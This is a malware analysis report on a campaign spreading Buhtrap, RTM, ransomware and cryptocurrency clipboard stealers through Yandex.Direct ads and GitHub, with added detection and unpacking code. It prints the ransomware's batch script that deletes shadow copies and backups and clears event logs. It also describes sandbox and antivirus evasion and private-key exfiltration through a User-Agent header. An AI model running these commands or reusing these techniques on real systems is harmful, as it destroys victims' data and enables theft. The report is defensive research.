Buhtrap backdoor and encryptor distributed via Yandex.Direct

To target accountants in a cyberattack, an attacker can use the working documents they search for online. That is roughly what a cybercrime group has been doing over the past few months, distributing the known backdoors Buhtrap and RTM, as well as file encryptors and software for stealing cryptocurrency. Most of the targets are located in Russia. The attack was carried out by placing malicious advertisements in Yandex.Direct. Potential victims were directed to a website where they were prompted to download a malicious file disguised as a document template. Yandex removed the malicious advertisement after our notification.

The Buhtrap source code was leaked online in the past, so anyone can use it. We have no information about the availability of the RTM code.

In this post we explain how the attackers distributed malware using Yandex.Direct and hosted it on GitHub. The post concludes with a technical analysis of the malware.


Buhtrap and RTM are back in business

Distribution and infection mechanism

The various payloads delivered to victims shared a common distribution mechanism. All malicious files created by the attackers were placed in two different GitHub repositories.

Typically, a repository contained a single downloadable malicious file, which changed frequently. Since GitHub exposes the change history of a repository, we can see which malware was distributed at any given time. To convince the victim to download the malicious file, the website blanki-shabloni24[.]ru, shown in the figure above, was used.

The site design and all the names of the malicious files follow a single theme: forms, templates, contracts, samples, and so on. Given that the Buhtrap and RTM tools had already been used in attacks on accountants in the past, we assumed the strategy in the new campaign was the same. The only question was how the victim reached the attackers' website.

Infection chain

At least some of the potential victims who landed on this site were lured there by malicious advertising. Below is an example URL:

https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=скачать бланк счета&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456

As the link shows, the banner was placed on the legitimate accounting forum bb.f2[.]kz. It is important to note that the banners appeared on various sites, all of them carried the same campaign id (blanki_rsya), and most of the sites related to accounting or legal assistance services. The URL shows that the potential victim used the search query "скачать бланк счета" ("download invoice form"), which supports our hypothesis of targeted attacks. Below are the sites on which the banners appeared and the corresponding search queries.

  • download invoice form – bb.f2[.]kz
  • contract sample – Ipopen[.]ru
  • complaint application sample – 77metrov[.]ru
  • contract form – blank-dogovor-kupli-prodazhi[.]ru
  • court petition sample – zen.yandex[.]ru
  • complaint sample – yurday[.]ru
  • contract form samples – Regforum[.]ru
  • contract form – assistentus[.]ru
  • apartment contract sample – napravah[.]com
  • legal contract samples – avito[.]ru

The blanki-shabloni24[.]ru site may have been set up to pass a superficial review. An advertisement pointing to a professional-looking site with a link to GitHub does not usually look like anything malicious. In addition, the attackers uploaded malicious files to the repository only for limited periods, probably while an advertising campaign was running. Most of the time, the GitHub repository contained an empty zip archive or an empty EXE file. In this way, the attackers could advertise through Yandex.Direct on sites most likely visited by accountants who arrived there in response to specific search queries.

Next, let's look at the various payloads distributed in this way.

Payload analysis

Distribution chronology

The malicious campaign began at the end of October 2018 and was still active at the time of writing. Since the entire repository was publicly available on GitHub, we compiled an accurate timeline of the distribution of six different malware families (see the figure below). For comparison with the git history, we added a line showing when the banner link was observed, as measured by ESET telemetry. As you can see, this correlates well with the availability of the payload on GitHub. The discrepancy at the end of February is explained by the fact that we lack part of the change history, because the repository was removed from GitHub before we could retrieve it in full.

Figure 1. Chronology of malware distribution.

Code signing certificates

The campaign used several code signing certificates. Some were used to sign more than one malware family, which further indicates that the different samples belong to the same campaign. Despite having the private key, the operators did not sign the binaries systematically and did not use the key for all samples. At the end of February 2019, the attackers began producing invalid signatures using a certificate belonging to Google, for which they did not have the private key.

All the certificates involved in the campaign and the malware families they sign are listed in the table below.

[Table: code signing certificates used in the campaign and the malware families signed with each]

We also used these code signing certificates to look for links with other malware families. For most of the certificates, we found no samples that were not delivered via a GitHub repository. However, the TOV "MARIYA" certificate was used to sign malware belonging to the Wauchos botnet, as well as adware and miners. It is unlikely that this malware is related to this campaign. Most likely, the certificate was purchased on the darknet.

Win32/Filecoder.Buhtrap

The first component that caught our attention was the newly discovered Win32/Filecoder.Buhtrap. It is a Delphi binary that is sometimes packed. It was distributed mainly in February and March 2019. It behaves like typical ransomware: it enumerates local drives and network shares and encrypts the files it finds. It does not require a network connection to do damage, because it does not contact a server to send encryption keys. Instead, it appends a "token" to the end of the ransom note and suggests using email or Bitmessage to contact the operators.

To encrypt as many valuable resources as possible, Filecoder.Buhtrap runs a thread that terminates key programs which may hold open handles on files containing valuable data and thus interfere with encryption. The targeted processes are mainly database management systems (DBMS). In addition, Filecoder.Buhtrap deletes log files and backups to make data recovery harder. To do this, it runs the batch script below.

bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
wbadmin delete systemstatebackup -keepversions:0
wbadmin delete backup
wmic shadowcopy delete
vssadmin delete shadows /all /quiet
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"
attrib "%userprofile%\documents\Default.rdp" -s -h
del "%userprofile%\documents\Default.rdp"
wevtutil.exe clear-log Application
wevtutil.exe clear-log Security
wevtutil.exe clear-log System
sc config eventlog start=disabled
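Every line of that script is a well-known ransomware pre-encryption indicator, and the value for a defender lies in correlating several of them on one host within a short window. The following is an added example (not part of the ESET analysis and not the malware's code) that runs regex rules derived from the script above over process-creation events, such as the CommandLine field of Sysmon Event ID 1, and reports hosts on which several distinct rules fire. The event records are constructed for the example.

```python
"""Hunt for the recovery-inhibition commands used by Filecoder.Buhtrap.

Added example, not code from the ESET analysis: it runs a few regex rules
over process-creation events (e.g. Sysmon Event ID 1 CommandLine fields) and
flags hosts on which several distinct rules fire, which is the pattern a
ransomware pre-encryption script produces. The event records are constructed.
"""
import re
from collections import defaultdict

# Rule name -> pattern over the command line. Each pattern is derived from one
# line of the batch script above; all allow an optional .exe suffix and
# flexible whitespace, and are matched case-insensitively.
RULES = {
    "shadow_copies_deleted": r"(?:vssadmin(?:\.exe)?\s+delete\s+shadows|wmic(?:\.exe)?\s+shadowcopy\s+delete)",
    "backup_catalog_deleted": r"wbadmin(?:\.exe)?\s+delete\s+(?:catalog|systemstatebackup|backup)\b",
    "boot_recovery_disabled": r"bcdedit(?:\.exe)?\s+/set\s+\{default\}\s+(?:recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)",
    "event_log_cleared": r"wevtutil(?:\.exe)?\s+(?:cl|clear-log)\s+(?:application|security|system)\b",
    "eventlog_service_disabled": r"\bsc(?:\.exe)?\s+config\s+eventlog\s+start\s*=\s*disabled",
    "rdp_history_wiped": r"reg(?:\.exe)?\s+delete\s+\"?hkey_current_user\\software\\microsoft\\terminal server client",
}
COMPILED = {name: re.compile(pat, re.IGNORECASE) for name, pat in RULES.items()}


def match_rules(command_line: str) -> list:
    """Return the sorted names of all rules that match one command line."""
    return sorted(name for name, rx in COMPILED.items() if rx.search(command_line))


def hunt(events, min_distinct_rules: int = 3) -> dict:
    """Group rule hits per host and return only hosts reaching the threshold.

    events: iterable of (host, image, command_line) tuples. Benign admin use
    (listing shadows, querying a log) never matches, so a single hit is already
    suspicious; three distinct rules on one host is treated as an incident.
    """
    hits = defaultdict(set)
    for host, _image, cmdline in events:
        hits[host].update(match_rules(cmdline))
    return {h: sorted(r) for h, r in hits.items() if len(r) >= min_distinct_rules}


# Constructed sample events: host1 runs the script, host2 runs benign commands.
SAMPLE_EVENTS = [
    ("host1", "cmd.exe", "vssadmin delete shadows /all /quiet"),
    ("host1", "cmd.exe", "wmic shadowcopy delete"),
    ("host1", "cmd.exe", "wbadmin delete catalog -quiet"),
    ("host1", "cmd.exe", "bcdedit /set {default} recoveryenabled no"),
    ("host1", "cmd.exe", "wevtutil.exe clear-log Security"),
    ("host1", "cmd.exe", "sc config eventlog start=disabled"),
    ("host1", "cmd.exe", r'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f'),
    ("host2", "powershell.exe", "vssadmin list shadows"),
    ("host2", "backupagent.exe", "wbadmin get versions"),
    ("host2", "cmd.exe", "wevtutil qe Security /c:5"),
]

if __name__ == "__main__":
    for host, rules in hunt(SAMPLE_EVENTS).items():
        print(host, rules)
```

The rules key on the destructive verbs (`delete shadows`, `delete catalog`, `clear-log`, `recoveryenabled no`), so routine use of the same tools does not fire them; in production the threshold should be evaluated per host over a time window rather than over the whole event set.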

Filecoder.Buhtrap uses a legitimate online IP Logger service designed to collect information about website visitors. This is used to track the ransomware's victims; the command line below is responsible for it:

mshta.exe "javascript:document.write('');"

Files are selected for encryption if they do not match any of three exclusion lists. First, files with the following extensions are not encrypted: .com, .cmd, .cpl, .dll, .exe, .hta, .lnk, .msc, .msi, .msp, .pif, .scr, .sys and .bat. Second, all files whose full path contains one of the directory strings from the list below are excluded.

.{ED7BA470-8E54-465E-825C-99712043E01C}
tor browser
opera
opera software
mozilla
mozilla firefox
internet explorer
google\chrome
google
boot
application data
apple computer\safari
appdata
all users
:\windows
:\system volume information
:\nvidia
:\intel

Third, certain file names are excluded from encryption, among them the file name of the ransom note. The list is given below. Clearly, all these exclusions are intended to keep the machine bootable and usable enough for the victim to read the note and pay, but no more than that.

boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntdetect.com
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
winupas.exe
your files are now encrypted.txt
windows update assistant.lnk
master.exe
unlock.exe
unlocker.exe
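The three lists fully determine which files the encryptor touches, which makes it possible to estimate the blast radius of an infection from a file inventory. The following is an added example (my reimplementation of the selection logic described above, not the malware's own code) that applies the three exclusion lists to Windows paths; the sample paths are constructed. Note that the second list is matched as plain substrings of the lower-cased full path, so a share named "Operations" is spared by the "opera" entry, and a "Google Drive" folder by the "google" entry.

```python
"""Reimplementation of Filecoder.Buhtrap's three exclusion lists.

Added example (not the malware's code): given a Windows path, decide whether
the encryptor would touch the file. Useful for estimating blast radius on a
file-share inventory or for building test fixtures. Paths are constructed.
"""
import ntpath  # Windows path semantics regardless of the host OS
from typing import Optional

EXCLUDED_EXTENSIONS = {
    ".com", ".cmd", ".cpl", ".dll", ".exe", ".hta", ".lnk", ".msc", ".msi",
    ".msp", ".pif", ".scr", ".sys", ".bat",
}

# Matched as substrings anywhere in the lower-cased full path, in this order.
EXCLUDED_PATH_SUBSTRINGS = [
    ".{ed7ba470-8e54-465e-825c-99712043e01c}", "tor browser", "opera",
    "opera software", "mozilla", "mozilla firefox", "internet explorer",
    "google\\chrome", "google", "boot", "application data",
    "apple computer\\safari", "appdata", "all users", ":\\windows",
    ":\\system volume information", ":\\nvidia", ":\\intel",
]

EXCLUDED_FILENAMES = {
    "boot.ini", "bootfont.bin", "bootsect.bak", "desktop.ini", "iconcache.db",
    "ntdetect.com", "ntldr", "ntuser.dat", "ntuser.dat.log", "ntuser.ini",
    "thumbs.db", "winupas.exe", "your files are now encrypted.txt",
    "windows update assistant.lnk", "master.exe", "unlock.exe", "unlocker.exe",
}


def exclusion_reason(path: str) -> Optional[str]:
    """Return which list excludes the path, or None if it would be encrypted."""
    p = path.lower()
    name = ntpath.basename(p)
    ext = ntpath.splitext(name)[1]
    if ext in EXCLUDED_EXTENSIONS:
        return f"extension {ext}"
    for frag in EXCLUDED_PATH_SUBSTRINGS:
        if frag in p:
            return f"path contains {frag!r}"
    if name in EXCLUDED_FILENAMES:
        return f"filename {name}"
    return None


def would_encrypt(path: str) -> bool:
    return exclusion_reason(path) is None


def triage(paths):
    """Split an inventory into (targets, [(skipped_path, reason), ...])."""
    targets, skipped = [], []
    for path in paths:
        reason = exclusion_reason(path)
        if reason is None:
            targets.append(path)
        else:
            skipped.append((path, reason))
    return targets, skipped


# Constructed sample inventory.
SAMPLE_PATHS = [
    r"C:\Users\ivan\Documents\contract_2019.docx",
    r"\\fileserver\accounting\1c_base\1Cv8.1CD",
    r"C:\Windows\System32\kernel32.dll",
    r"C:\Users\ivan\AppData\Roaming\notes.txt",
    r"C:\Users\ivan\Desktop\your files are now encrypted.txt",
    r"D:\Backups\boot\2019-02.bak",
    r"C:\Users\ivan\Google Drive\ledger.xlsx",
    r"\\fileserver\Operations\plan.xlsx",
]

if __name__ == "__main__":
    targets, skipped = triage(SAMPLE_PATHS)
    print("would encrypt:", targets)
    for path, reason in skipped:
        print("skipped:", path, "->", reason)
```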

File encryption scheme

On execution, the malware generates a 512-bit RSA key pair. The private exponent (d) and modulus (n) are then encrypted with a hard-coded 2048-bit public key (public exponent and modulus), zlib-compressed and base64-encoded. The code responsible for this is shown in Figure 2.

Figure 2. Hex-Rays decompilation output of the 512-bit RSA key pair generation.

Below is an example of the plaintext containing a generated private key; this is the token appended to the ransom note.

DF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B237F7A2B3BF129AE2F399197ECC0DD002D5E60C20CE3780AB9D1FE61A47D9735036907E3F0CF8BE09E3E7646F8388AAC75FF6A4F60E7F4C2F697BF6E47B2DBCDEC156EAD854CADE53A239

The attackers' public key is given below.

e = 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
n = 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

Files are encrypted with AES in CBC mode; the original analysis describes this as AES-128-CBC with a 256-bit key, which is internally inconsistent (AES-128 takes a 128-bit key), so treat the exact key length as unconfirmed. A new key and a new initialization vector are generated for each encrypted file. The key material is appended to the end of the encrypted file. Let's look at the format of an encrypted file.
Encrypted files have the following header:

[Figure: header of an encrypted file]

The original file data is encrypted with the magic value VEGA appended, up to the first 0x5000 bytes. All the information needed for decryption is appended to the file with the following structure:

[Figure: structure of the decryption information appended to an encrypted file]

- the file size field contains a flag indicating whether the file is larger than 0x5000 bytes
- AES key blob = ZlibCompress(RSAEncrypt(AES key + IV, public key of the generated RSA key pair))
- RSA key blob = ZlibCompress(RSAEncrypt(generated RSA private key, hard-coded RSA public key))

Win32/ClipBanker

Win32/ClipBanker is a component that was distributed intermittently from the end of October to the beginning of December 2018. Its role is to monitor the contents of the clipboard, looking for cryptocurrency wallet addresses. When it finds a target wallet address, ClipBanker replaces it with an address believed to belong to the operators. The samples we examined were neither packed nor obfuscated. The only mechanism used to mask its behavior is string encryption: the operators' wallet addresses are encrypted with RC4. The targeted cryptocurrencies are Bitcoin, Bitcoin Cash, Dogecoin, Ethereum and Ripple.

During the period in which the malware was being distributed, only small amounts of BTC were sent to the attackers' Bitcoin wallets, which casts doubt on the success of the campaign. Moreover, there is no evidence that these transactions were related to ClipBanker at all.

Win32/RTM

The Win32/RTM component was distributed for several days at the beginning of March 2019. RTM is a banking Trojan written in Delphi that targets remote banking systems. In 2017, ESET researchers published a detailed analysis of this program, and that description is still relevant. In January 2019, Palo Alto Networks also released a blog post about RTM.

Buhtrap loader

For some time, a loader that did not resemble earlier Buhtrap tools was available on GitHub. It contacts https://94.100.18[.]67/RSS.php?<some_id> to fetch the next stage and loads it directly into memory. We can distinguish two behaviors of the second-stage code. In the first, RSS.php returned the Buhtrap backdoor directly; this backdoor is very similar to the one available after the source code leak.

Interestingly, we see several campaigns using the Buhtrap backdoor, and they are believed to be run by different operators. In this case, the main difference is that the backdoor is loaded directly into memory and does not use the usual scheme with the DLL deployment process we discussed earlier. In addition, the operators changed the RC4 key used to encrypt network traffic to the C&C server. In most campaigns we have observed, the operators did not bother to change this key.

In the second, more complex behavior, the RSS.php URL handed over another loader. It implemented some obfuscation, such as rebuilding the import table dynamically. The purpose of this loader is to contact the C&C server msiofficeupd[.]com/api/F27F84EDA4D13B15/2, send logs and wait for a response. It treats the response as a blob, loads it into memory and executes it. The payload we observed being run by this loader was the same Buhtrap backdoor, but there may be other components.

Android/Spy.Banker

Interestingly, a component for Android was also found in the GitHub repository. It was present in the master branch for only one day: November 1, 2018. Apart from the GitHub posting, ESET telemetry found no evidence of this malware being distributed.

The component was packaged as an Android Application Package (APK). It is heavily obfuscated. The malicious functionality is hidden in an encrypted JAR inside the APK. It is encrypted with RC4 using this key:

key = [
0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96
]

The same key and algorithm are used to encrypt strings. The JAR is located at APK_ROOT + image/files. The first 4 bytes of the file hold the length of the encrypted JAR, which begins immediately after the length field.
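The container layout above is simple enough to unpack without the APK's own code. The following is an added example (not code from the ESET analysis or from the APK) that implements RC4 with the key shown above and parses the length-prefixed container to recover the JAR, checking the result against the ZIP signature a JAR must start with. The analysis does not state the byte order of the length field; little-endian is assumed here, and the container used in the demo is constructed rather than taken from a real sample.

```python
"""Unpack the RC4-encrypted JAR carried by the Android/Spy.Banker APK.

Added example, not the APK's own code. It implements RC4 (the key is the
37-byte key shown above) and the container layout described in the text:
a 4-byte length field followed by the encrypted JAR. The byte order of the
length field is not stated in the analysis; little-endian is assumed here.
The container built in the demo is constructed, not a real sample.
"""
import struct

RC4_KEY = bytes([
    0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
    0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
    0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96,
])

ZIP_MAGIC = b"PK\x03\x04"  # a JAR is a ZIP archive


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA); encryption and decryption are the same operation."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def extract_jar(container: bytes, key: bytes = RC4_KEY) -> bytes:
    """Parse the length-prefixed container and return the decrypted JAR.

    Raises ValueError if the length field is inconsistent with the data or
    the result does not look like a ZIP archive (wrong key or byte order).
    """
    if len(container) < 4:
        raise ValueError("container too short for a length field")
    (length,) = struct.unpack("<I", container[:4])  # assumption: little-endian
    if 4 + length > len(container):
        raise ValueError(f"length field {length} exceeds available {len(container) - 4} bytes")
    jar = rc4(key, container[4:4 + length])
    if not jar.startswith(ZIP_MAGIC):
        raise ValueError("decrypted data is not a ZIP/JAR; wrong key or byte order?")
    return jar


def decrypt_string(blob: bytes, key: bytes = RC4_KEY) -> str:
    """The same key and algorithm cover the APK's encrypted strings."""
    return rc4(key, blob).decode("utf-8", errors="replace")


def build_container(jar: bytes, key: bytes = RC4_KEY) -> bytes:
    """Inverse of extract_jar; used here only to construct a demo sample."""
    return struct.pack("<I", len(jar)) + rc4(key, jar)


# Constructed demo: a fake JAR that is a ZIP local-file-header prefix plus filler.
FAKE_JAR = ZIP_MAGIC + b"\x14\x00" + b"classes.dex payload placeholder " * 4

if __name__ == "__main__":
    sample = build_container(FAKE_JAR)
    recovered = extract_jar(sample)
    print(len(recovered), "bytes recovered, starts with", recovered[:4])
```

If the ZIP check fails on a real sample, try big-endian for the length field before suspecting the key; the RC4 implementation itself can be checked against the standard "Key"/"Plaintext" test vector.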

After decrypting the file, we found that it is Anubis, a previously documented Android banker. The malware has the following capabilities:

  • microphone recording
  • taking screenshots
  • obtaining GPS coordinates
  • keylogging
  • encrypting device data and demanding a ransom
  • sending spam

Interestingly, the banker used Twitter as a fallback communication channel to obtain another C&C server. The sample we analyzed used the @JonesTrader account, but at the time of analysis it had already been suspended.

The banker contains a list of target applications installed on the Android device. It is longer than the list obtained in the Sophos study. The list includes many banking applications, online shopping apps such as Amazon and eBay, and cryptocurrency services.

MSIL/ClipBanker.IH

The last component distributed as part of this campaign was a .NET Windows executable, which appeared in March 2019. Most of the versions studied are packed with ConfuserEx v1.0.0. Like ClipBanker, this component abuses the clipboard. It targets a wide range of cryptocurrencies, as well as trade offers on Steam. In addition, it uses the IP Logger service to steal Bitcoin private keys in WIF format.

Protection mechanisms
In addition to the anti-debugging, anti-dumping and anti-tampering protections provided by ConfuserEx, the component can detect antivirus products and virtual machines.

To check whether it is running in a virtual machine, the malware uses the built-in Windows WMI command line tool (WMIC) to query BIOS information, namely:

wmic bios

The program then parses the command output and looks for the keywords VBOX, VirtualBox, XEN, qemu, bochs and VM.

To detect antivirus products, the malware sends a Windows Management Instrumentation (WMI) query to the Windows Security Center using the ManagementObjectSearcher API, as shown below. After base64 decoding, the call looks like this:

ManagementObjectSearcher('root\SecurityCenter2', 'SELECT * FROM AntivirusProduct')

Figure 3. Process for detecting antivirus products.

In addition, the malware checks whether CryptoClipWatcher, a tool that protects against clipboard hijacking, is running and, if so, suspends all threads in that process, thereby disabling the protection.

Persistence

The version of the malware we studied copies itself to %APPDATA%\google\updater.exe and sets the "hidden" attribute on the google directory. It then modifies the Software\Microsoft\Windows NT\CurrentVersion\Winlogon\shell value in the Windows registry, adding the path of updater.exe. In this way the malware is executed every time the user logs in.

Malicious behavior

Like ClipBanker, the malware monitors the contents of the clipboard, looks for cryptocurrency wallet addresses and, when it finds one, replaces it with one of the operators' addresses. Below is the list of targeted address types, based on what was found in the code.

BTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR, DCR, XRP, DOGE, DASH, ZEC_T_ADDR, ZEC_Z_ADDR, STELLAR, NEO, ADA, IOTA, NANO_1, NANO_3, BANANO_1, BANANO_3, STRATIS, NIOBIO, LISK, QTUM, WMZ, WMX, WME, VERTCOIN, TRON, TEZOS, QIWI_ID, YANDEX_ID, NAMECOIN, B58_PRIVATEKEY, STEAM_URL

Each address type has a corresponding regular expression. The STEAM_URL value is used to attack the Steam trading system, as can be seen from the regular expression used to find it in the clipboard buffer:

\b(https://|http://|)steamcommunity.com/tradeoffer/new/\?partner=[0-9]+&token=[a-zA-Z0-9]+\b
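The per-type regular expression approach cuts both ways: the same classifier a clipbanker uses to pick targets is what a clipboard guard needs in order to notice that the value about to be pasted is a different address of the same kind as the one the user copied. The following is an added example (not ClipBanker.IH's code) that classifies clipboard text for a subset of the address families listed above and implements that swap check. The STEAM_URL pattern is the one shown in the text; the other patterns are my own, since the malware's exact expressions are not reproduced in the analysis. The sample strings are constructed; the Bitcoin addresses are public documentation examples.

```python
"""Classify clipboard text the way a clipbanker does, and detect a swap.

Added example, not ClipBanker.IH's code. STEAM_URL is the pattern shown in
the analysis; the other patterns are my own for a subset of the address
families listed above. detect_swap() is the check a clipboard guard such as
CryptoClipWatcher performs: the value about to be pasted is compared with the
value the user copied. Sample strings are constructed; the Bitcoin addresses
are public documentation examples.
"""
import re

PATTERNS = {
    "BTC_P2PKH": r"\b1[a-km-zA-HJ-NP-Z1-9]{25,33}\b",
    "BTC_P2SH": r"\b3[a-km-zA-HJ-NP-Z1-9]{25,33}\b",
    "BTC_BECH32": r"\bbc1[ac-hj-np-z02-9]{38,59}\b",
    "ETH_ERC20": r"\b0x[0-9a-fA-F]{40}\b",
    "XMR": r"\b4[0-9AB][1-9A-HJ-NP-Za-km-z]{93}\b",
    "STEAM_URL": r"\b(https://|http://|)steamcommunity.com/tradeoffer/new/\?partner=[0-9]+&token=[a-zA-Z0-9]+\b",
}
COMPILED = {kind: re.compile(p) for kind, p in PATTERNS.items()}

# Address kinds an attacker can substitute for one another without the
# transaction failing: the wallet only checks that the address is valid.
FAMILY = {
    "BTC_P2PKH": "BTC", "BTC_P2SH": "BTC", "BTC_BECH32": "BTC",
    "ETH_ERC20": "ETH", "XMR": "XMR", "STEAM_URL": "STEAM",
}


def classify(text: str):
    """Return [(kind, matched_text), ...] for every recognised value in text."""
    hits = []
    for kind, rx in COMPILED.items():
        for m in rx.finditer(text):
            hits.append((kind, m.group(0)))
    return hits


def detect_swap(copied: str, pasted: str):
    """Return (family, copied_value, pasted_value) if a clipbanker-style
    substitution is detected, else None.

    A swap is: the user copied exactly one recognised value, and the text
    about to be pasted holds a different recognised value of the same family.
    """
    src = classify(copied)
    dst = classify(pasted)
    if len(src) != 1 or len(dst) != 1:
        return None  # only single-value clipboard contents are judged
    (src_kind, src_val), (dst_kind, dst_val) = src[0], dst[0]
    if FAMILY[src_kind] == FAMILY[dst_kind] and src_val != dst_val:
        return (FAMILY[src_kind], src_val, dst_val)
    return None


# Constructed samples.
USER_COPIED = "1BvBMSEYstWetqTFn5Au4m4GFg7xJaNVN2"
SWAPPED_TO = "bc1qar0srrr7xfkvy5l643lydnw9re59gtzzwf5mdq"
STEAM_LINK = "https://steamcommunity.com/tradeoffer/new/?partner=12345678&token=AbCdEfGh"

if __name__ == "__main__":
    print(classify(USER_COPIED))
    print(classify(STEAM_LINK))
    print(detect_swap(USER_COPIED, SWAPPED_TO))
```

Comparing by family rather than by exact kind matters: a P2PKH address copied by the user can be replaced with a bech32 one, and a guard that only checks "same regex, different string" would miss it. The patterns are deliberately loose (no checksum validation), which is also how the malware behaves; a production guard would additionally validate the Base58Check or bech32 checksum to reduce false positives on ordinary text.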

Exfiltration channel

In addition to replacing addresses in the clipboard, the malware targets the WIF private keys of Bitcoin, Bitcoin Core and Electrum wallets. The program uses iplogger.org as the exfiltration channel for the WIF private key. To do this, the operators place the private key data in the HTTP User-Agent header, as shown below.

Figure 4. IP Logger console with exfiltrated data.

The operators did not use iplogger.org to exfiltrate wallet files. They probably chose a different method because of the 255-character limit on the User-Agent field shown in the IP Logger web interface. In the samples we studied, the other exfiltration server was stored in the DiscordWebHook environment variable. Surprisingly, this environment variable is not set anywhere in the code. This suggests that the malware is still under development and that the variable is set on the operator's test machine.

There is another sign that the program is under development. The binary contains two iplogger.org URLs, and both are queried when data is exfiltrated. In the request to one of these URLs, the value of the Referer field is prefixed with "DEV /". We also found a version not packed with ConfuserEx, in which the variable holding this URL is named DevFeedbackUrl. Based on the environment variable name, we believe the operators plan to use the legitimate Discord service and its webhook system to steal cryptocurrency wallets.

Conclusion

This campaign is an example of legitimate advertising services being used in cyberattacks. The campaign targets Russian organizations, but we would not be surprised to see a similar attack using non-Russian services. To avoid compromise, users should be confident in the reputation of the source of the software they download.

A full list of indicators of compromise and MITRE ATT&CK attributes is available at the link.

Source: www.habr.com
